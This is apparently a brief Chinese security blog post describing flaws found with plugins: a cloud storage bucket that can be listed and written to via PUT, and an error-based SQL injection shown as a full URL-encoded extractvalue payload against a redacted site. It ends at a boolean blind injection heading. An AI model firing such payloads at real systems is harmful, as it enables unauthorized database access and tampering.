夜雨聆风
使用插件就挖出的漏洞
本公众号“小帅安全”旨在分享网络安全领域的相关知识,仅限于学习和研究之用。本公众号并不鼓励或支持任何非法活动。本公众号中提供的所有内容都是基于作者的经验和知识,并仅代表作者个人的观点和意见。这些观点和意见仅供参考,不构成任何形式的承诺或保证。本公众号不对任何人因使用或依赖本公众号提供的信息、工具或技术所造成的任何损失或伤害负责。本公众号提供的技术和工具仅限于学习和研究之用,不得用于非法活动。任何非法活动均与本公众号的立场和政策相违背,并将依法承担法律责任。本公众号不对使用本公众号提供的工具和技术所造成的任何直接或间接损失负责。使用者必须自行承担使用风险,同时对自己的行为负全部责任。本公众号保留随时修改或补充免责声明的权利,而不需事先通知。
存储桶遍历+可写
谛听鉴-云存储桶风险监测插件
夸克网盘下载地址:https://pan.quark.cn/s/fe9fbb8ad3f3
后台回复OSSFileBrowse
自动获取
PUT可上传文件
写一个1.txt,内容为123
SQL注入–报错注入
后台回复Detsql
自动获取
https://xxx.com/v1/front/grade/user?gradeId=&keyWords=%27and%2F**%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281836161162%29%29%29and%27&education=&collegeId=&departmentId=&majorId=
SQL注入—布尔盲注
